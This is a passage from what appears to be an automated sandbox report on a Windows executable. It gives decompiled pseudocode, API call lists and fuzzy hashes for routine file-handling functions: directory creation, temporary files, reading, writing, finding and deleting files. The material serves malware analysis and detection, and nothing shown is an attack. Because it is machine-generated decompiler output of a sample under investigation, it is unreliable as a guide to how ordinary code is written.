                                • Part of subcall function 0040489C: SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: File$Attributes$ApisH_prolog
                              • String ID:
                              • API String ID: 3885834519-0
                              • Opcode ID: 5b715810b1dd674a34631cbecd8c08cc0b37525bd29b6e223b4e60d05e4c896b
                              • Instruction ID: d8abee0b5bf8aaacd3c7805e8248c04f8c14d25ec22198af343fb12e16f398c4
                              • Opcode Fuzzy Hash: 5b715810b1dd674a34631cbecd8c08cc0b37525bd29b6e223b4e60d05e4c896b
                              • Instruction Fuzzy Hash: 76E02B66F002502BC7103BA5AC065DB3B9D9B81314B20C43BA602A3291E9388E44A258
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040499C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0040499C(WCHAR* __ecx) {
				char _v16;
				void* __ebp;
				signed int _t5;
				void* _t8;

				if( *0x423148 != 0) {
					_t5 = CreateDirectoryW(__ecx, 0); // executed
					return _t5 & 0xffffff00 | _t5 != 0x00000000;
				} else {
					_t8 = E0040498D( *((intOrPtr*)(E004048FF( &_v16, __ecx))));
					E00403A9C(_v16);
					return _t8;
				}
			}







                              0x004049a9
                              0x004049d0
                              0x004049dc
                              0x004049ab
                              0x004049b8
                              0x004049c2
                              0x004049cc
                              0x004049cc

                              APIs
                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,00000000), ref: 004049D0
                                • Part of subcall function 004048FF: __EH_prolog.LIBCMT ref: 00404904
                                • Part of subcall function 004048FF: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00404920
                                • Part of subcall function 0040498D: CreateDirectoryA.KERNELBASE(?,00000000,00405228,?,?,?,?,00000003,?,00000000,?,00000000), ref: 00404990
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: CreateDirectory$ApisFileH_prolog
                              • String ID:
                              • API String ID: 1021588753-0
                              • Opcode ID: 64b02790250bc5f7a2d9c9dee2bb0ba3baf7154ac0717740dd27b10109941aca
                              • Instruction ID: 2f64d7a75cdf7ff6db5ed191fdbb19fa086d8aebc57dacf92a4c812467fb8a6f
                              • Opcode Fuzzy Hash: 64b02790250bc5f7a2d9c9dee2bb0ba3baf7154ac0717740dd27b10109941aca
                              • Instruction Fuzzy Hash: 18E0DFA0B002002BCB147B79AC0679E376D4B80218F10867EA652671E1EA7999449608
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004050AB Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004050AB(CHAR* __ecx, CHAR* __edx, CHAR** _a4) {
				int _t4;
				CHAR* _t8;
				CHAR* _t13;
				CHAR** _t15;

				_t15 = _a4;
				_t13 = __edx;
				_t8 = __ecx;
				if(_t15[2] <= 0x105) {
					E0040243E(_t15, 0x105);
				}
				_t4 = GetTempFileNameA(_t8, _t13, 0,  *_t15); // executed
				E00404296(_t15);
				return _t4;
			}







                              0x004050ad
                              0x004050b7
                              0x004050bc
                              0x004050be
                              0x004050c3
                              0x004050c3
                              0x004050ce
                              0x004050d8
                              0x004050e2

                              APIs
                              • GetTempFileNameA.KERNELBASE(?,?,00000000,00000003,?,?,00000000,004050FF,?,?,?,00405160,?,?,?,00000003), ref: 004050CE
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: FileNameTemp
                              • String ID:
                              • API String ID: 745986568-0
                              • Opcode ID: b528cc7740eeb1b4bc26185d4807bc948aa73c1e47f21f7391ebf62f515a6cd3
                              • Instruction ID: d5c13e583cf4c34c7a3a11816bb62f42e40da82da4d3cfe63a6d47b8b5213b5b
                              • Opcode Fuzzy Hash: b528cc7740eeb1b4bc26185d4807bc948aa73c1e47f21f7391ebf62f515a6cd3
                              • Instruction Fuzzy Hash: 91E086723016106BD71056699C45A4BA7DEDFD8752F15843FB545E3381D6B48C004A78
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004058CD Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                              Download Yara Rule
                              C-Code - Quality: 84%
                              			E004058CD(void* __ecx, void* __edx, void* __eflags) {
				void* _t10;
				void* _t25;

				E00413954(E00419718, _t25);
				E00404D51(_t25 - 0x44);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_push(__ecx);
				_t10 = E00405806(_t25 - 0x44, __edx); // executed
				E00403A9C( *((intOrPtr*)(_t25 - 0x1c)));
				 *[fs:0x0] =  *((intOrPtr*)(_t25 - 0xc));
				return _t10;
			}





                              0x004058d2
                              0x004058e1
                              0x004058e6
                              0x004058ea
                              0x004058ee
                              0x004058f8
                              0x00405905
                              0x0040590d

                              APIs
                              • __EH_prolog.LIBCMT ref: 004058D2
                                • Part of subcall function 00405806: __EH_prolog.LIBCMT ref: 0040580B
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 4dbd7d17023fb4ed967e01381c8a8867ec9f7b58b557c0ee91cef2e13e81d9e3
                              • Instruction ID: 5bfd618a99589873673dbdde5608ad138896477ef474a485a6b18cf586c7d2b5
                              • Opcode Fuzzy Hash: 4dbd7d17023fb4ed967e01381c8a8867ec9f7b58b557c0ee91cef2e13e81d9e3
                              • Instruction Fuzzy Hash: E7E01A72D410049ACB05BB95E9526EDB778EF51319F10403BA412725919B785E18CA58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00405C87 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 86%
                              			E00405C87(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				long _t12;
				signed int _t14;
				void** _t16;

				_t16 = __ecx;
				_push(__ecx);
				_t12 =  *0x42045c; // 0x400000
				if(_a8 > _t12) {
					_a8 = _t12;
				}
				_v8 = _v8 & 0x00000000;
				_t14 = WriteFile( *_t16, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t14 & 0xffffff00 | _t14 != 0x00000000;
			}







                              0x00405c87
                              0x00405c8a
                              0x00405c8b
                              0x00405c93
                              0x00405c95
                              0x00405c95
                              0x00405c9e
                              0x00405caa
                              0x00405cb8
                              0x00405cbe

                              APIs
                              • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00405CAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: FileWrite
                              • String ID:
                              • API String ID: 3934441357-0
                              • Opcode ID: e8bb3e3f97a2863afff16af0127552a93838812ee23e56086e0288621279a6ee
                              • Instruction ID: 646c0e8b7f70081892c45aa98fa77e415187d9694f298a279afc83584de54578
                              • Opcode Fuzzy Hash: e8bb3e3f97a2863afff16af0127552a93838812ee23e56086e0288621279a6ee
                              • Instruction Fuzzy Hash: F8E0E575600208FFCB11CF95C801B8E7BF9EB09364F20C069F914AA260D339EA50DF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004057CF Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004057CF(void** __ecx, intOrPtr _a4) {
				struct _WIN32_FIND_DATAA _v324;
				int _t7;
				signed int _t10;
				signed int _t11;

				_t7 = FindNextFileA( *__ecx,  &_v324); // executed
				_t11 = _t10 & 0xffffff00 | _t7 != 0x00000000;
				_t16 = _t11;
				if(_t11 != 0) {
					E0040557F( &_v324, _a4, _t16);
				}
				return _t11;
			}







                              0x004057e2
                              0x004057ea
                              0x004057ed
                              0x004057ef
                              0x004057fa
                              0x004057fa
                              0x00405803

                              APIs
                              • FindNextFileA.KERNELBASE(000000FF,?,00000000), ref: 004057E2
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: FileFindNext
                              • String ID:
                              • API String ID: 2029273394-0
                              • Opcode ID: 3f971b6e9297c3c0785ec7bffefe866e244883e864d52b31c5d14701259a415c
                              • Instruction ID: a758ab2b17ce6f49d488120cb08fd5c978c50398f8c9baf96463bb2a7ddcf629
                              • Opcode Fuzzy Hash: 3f971b6e9297c3c0785ec7bffefe866e244883e864d52b31c5d14701259a415c
                              • Instruction Fuzzy Hash: 7CD0C231140009ABC711EB21DC41EEA33ADEB04348F144075AA495B1B0EA319D489F54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00405841 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                              Download Yara Rule
                              C-Code - Quality: 86%
                              			E00405841(void* __ecx, void* __edx) {
				void* _t11;
				void* _t22;

				E00413954(E004196F0, _t22);
				_push(__ecx);
				 *(_t22 - 0x10) =  *(_t22 - 0x10) | 0xffffffff;
				_t3 = _t22 - 4;
				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
				_t11 = E004055DE(_t22 - 0x10,  *_t3,  *((intOrPtr*)(_t22 + 8)), __ecx); // executed
				E0040551A(_t22 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t22 - 0xc));
				return _t11;
			}





                              0x00405846
                              0x0040584b
                              0x0040584c
                              0x00405851
                              0x00405851
                              0x0040585c
                              0x00405866
                              0x00405871
                              0x00405879

                              APIs
                              • __EH_prolog.LIBCMT ref: 00405846
                                • Part of subcall function 004055DE: __EH_prolog.LIBCMT ref: 004055E3
                                • Part of subcall function 004055DE: FindFirstFileW.KERNELBASE(?,?), ref: 00405611
                                • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: FindH_prolog$CloseFileFirst
                              • String ID:
                              • API String ID: 2004497850-0
                              • Opcode ID: 220b4cbfc40620496b03372d3826f196b8ab05123004ed9f75f8387d5271fe3c
                              • Instruction ID: b7fde63f1f0c292b4e5d00ec8c3d5d27a79480d2707f186765d0e2b5b752fd38
                              • Opcode Fuzzy Hash: 220b4cbfc40620496b03372d3826f196b8ab05123004ed9f75f8387d5271fe3c
                              • Instruction Fuzzy Hash: 7CE04FB1951506ABCB14DF50CC52AEEB734FB1131CF10421EE021722D08B785648CA28
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00405806 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                              Download Yara Rule
                              C-Code - Quality: 86%
                              			E00405806(void* __ecx, void* __edx) {
				void* _t11;
				void* _t22;

				E00413954(E004196DC, _t22);
				_push(__ecx);
				 *(_t22 - 0x10) =  *(_t22 - 0x10) | 0xffffffff;
				_t3 = _t22 - 4;
				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
				_t11 = E0040553A(_t22 - 0x10,  *_t3,  *((intOrPtr*)(_t22 + 8)), __ecx); // executed
				E0040551A(_t22 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t22 - 0xc));
				return _t11;
			}





                              0x0040580b
                              0x00405810
                              0x00405811
                              0x00405816
                              0x00405816
                              0x00405821
                              0x0040582b
                              0x00405836
                              0x0040583e

                              APIs
                              • __EH_prolog.LIBCMT ref: 0040580B
                                • Part of subcall function 0040553A: FindFirstFileA.KERNELBASE(?,?,000000FF), ref: 00405559
                                • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: Find$CloseFileFirstH_prolog
                              • String ID:
                              • API String ID: 889498515-0
                              • Opcode ID: bc6002362a3e3570d7b7dbbff413248cb0e6e96336b5f812f3c621cb83c14948
                              • Instruction ID: 15a52a3ac40e1f9f01e416ae3406c700f8aec04b6379e90cb97043f6baa550c5
                              • Opcode Fuzzy Hash: bc6002362a3e3570d7b7dbbff413248cb0e6e96336b5f812f3c621cb83c14948
                              • Instruction Fuzzy Hash: 2AE01AB195150AAACB04DB50CC52AEEB760EB1131CF00421AA421722D0877856488A28
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040F8C3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                              Download Yara Rule
                              C-Code - Quality: 82%
                              			E0040F8C3(intOrPtr* __ecx, void* __eflags) {
				void* _t8;
				void* _t17;
				intOrPtr _t19;

				E00413954(E0041A808, _t17);
				_push(__ecx);
				 *(_t17 - 4) =  *(_t17 - 4) & 0x00000000;
				 *((intOrPtr*)(_t17 - 0x10)) = _t19;
				_t8 = E0040F648(__ecx, __eflags,  *((intOrPtr*)(_t17 + 8))); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t17 - 0xc));
				return _t8;
			}






                              0x0040f8c8
                              0x0040f8cd
                              0x0040f8ce
                              0x0040f8d5
                              0x0040f8db
                              0x0040f8f0
                              0x0040f8f9

                              APIs
                              • __EH_prolog.LIBCMT ref: 0040F8C8
                                • Part of subcall function 0040F648: __EH_prolog.LIBCMT ref: 0040F64D
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: fd9f4e5796ff426001010c6032b0bd2709108ec26b7ef45d9eef3846ac2bdd07
                              • Instruction ID: 6b40bdca6a02cd8c303c1b1c800ac92429027f894e9b325ac65d5e69f4ab0667
                              • Opcode Fuzzy Hash: fd9f4e5796ff426001010c6032b0bd2709108ec26b7ef45d9eef3846ac2bdd07
                              • Instruction Fuzzy Hash: 0CD01272911104EBD711AB49D842BDEBB68EB8135DF10853BF00171550C37D56459569
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00405B7B Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 75%
                              			E00405B7B(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				signed int _t11;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t11 = ReadFile( *__ecx, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t11 & 0xffffff00 | _t11 != 0x00000000;
			}





                              0x00405b7e
                              0x00405b85
                              0x00405b91
                              0x00405b9f
                              0x00405ba5

                              APIs
                              • ReadFile.KERNELBASE(000000FF,00000000,?,?,00000000,000000FF,?,00405BC6,00000000,?,00000000,?,00405BEC,00000000,?,00000000), ref: 00405B91
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID:
                              • API String ID: 2738559852-0
                              • Opcode ID: a0fa365660526cfbb9cae47ffd537a5a3e67cffdb1018a760807b9850e2f108c
                              • Instruction ID: c5e24743f6b433bb21cc94cc2971fe47eb8403274bd7f90fdb54931116458873
                              • Opcode Fuzzy Hash: a0fa365660526cfbb9cae47ffd537a5a3e67cffdb1018a760807b9850e2f108c
                              • Instruction Fuzzy Hash: 7EE0EC75241208FBCB01CF90CD01FCE7BB9EB49754F208058E90596160D375AA14EB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040551A Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0040551A(void** __ecx) {
				void* _t1;
				int _t3;
				signed int* _t6;

				_t6 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0xffffffff) {
					L4:
					return 1;
				} else {
					_t3 = FindClose(_t1); // executed
					if(_t3 != 0) {
						 *_t6 =  *_t6 | 0xffffffff;
						goto L4;
					} else {
						return 0;
					}
				}
			}






                              0x0040551b
                              0x0040551d
                              0x00405522
                              0x00405536
                              0x00405539
                              0x00405524
                              0x00405525
                              0x0040552d
                              0x00405533
                              0x00000000
                              0x0040552f
                              0x00405532
                              0x00405532
                              0x0040552d

                              APIs
                              • FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: CloseFind
                              • String ID:
                              • API String ID: 1863332320-0
                              • Opcode ID: a5f15e60ddec85d8ac06024adb1482cc35c18756887bd61c03bc9ed0d5cb4483
                              • Instruction ID: 986561ebb0227da743eeb2b9ec995cdcc659c9848a972ac8d271436d9e92df52
                              • Opcode Fuzzy Hash: a5f15e60ddec85d8ac06024adb1482cc35c18756887bd61c03bc9ed0d5cb4483
                              • Instruction Fuzzy Hash: 6BD0123150452166CF745E3C7C459C333D99A123B03660BAAF4B4D32E5D3748CC35AD4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00405A63 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00405A63(void** __ecx) {
				void* _t1;
				int _t3;
				signed int* _t6;

				_t6 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0xffffffff) {
					L4:
					return 1;
				} else {
					_t3 = FindCloseChangeNotification(_t1); // executed
					if(_t3 != 0) {
						 *_t6 =  *_t6 | 0xffffffff;
						goto L4;
					} else {
						return 0;
					}
				}
			}






                              0x00405a64
                              0x00405a66
                              0x00405a6b
                              0x00405a7f
                              0x00405a82
                              0x00405a6d
                              0x00405a6e
                              0x00405a76
                              0x00405a7c
                              0x00000000
                              0x00405a78
                              0x00405a7b
                              0x00405a7b
                              0x00405a76

                              APIs
                              • FindCloseChangeNotification.KERNELBASE(00000000,?,00405A2C,?,00000000,00000003,?,00000000,?,00000000), ref: 00405A6E
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: ChangeCloseFindNotification
                              • String ID:
                              • API String ID: 2591292051-0
                              • Opcode ID: 762bf37c8decbf6063af4facc99c374a5abed3ea2b8a5978318a093aad6de801
                              • Instruction ID: 8a38a6d9813b312501c47e0c29c9a2f8cf12ac5fa7676fc4773f80372e0f1af5
                              • Opcode Fuzzy Hash: 762bf37c8decbf6063af4facc99c374a5abed3ea2b8a5978318a093aad6de801
                              • Instruction Fuzzy Hash: 5CD0C93160462146CA645E3C7C849D737D89A16330325176AF0B5D22E4D3748D875E94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00404BDC Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00404BDC(CHAR* __ecx, void* __eflags) {
				void* _t3;
				signed int _t4;

				_t3 = E0040489C(__ecx, 0);
				if(_t3 != 0) {
					_t4 = DeleteFileA(__ecx); // executed
					return _t4 & 0xffffff00 | _t4 != 0x00000000;
				} else {
					return _t3;
				}
			}





                              0x00404be1
                              0x00404be8
                              0x00404bed
                              0x00404bf9
                              0x00404beb
                              0x00404beb
                              0x00404beb

                              APIs
                                • Part of subcall function 0040489C: SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E
                              • DeleteFileA.KERNELBASE(?,?,00404DBF,?,00000000,?,?,?,?,?,00000000), ref: 00404BED
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: File$AttributesDelete
                              • String ID:
                              • API String ID: 2910425767-0
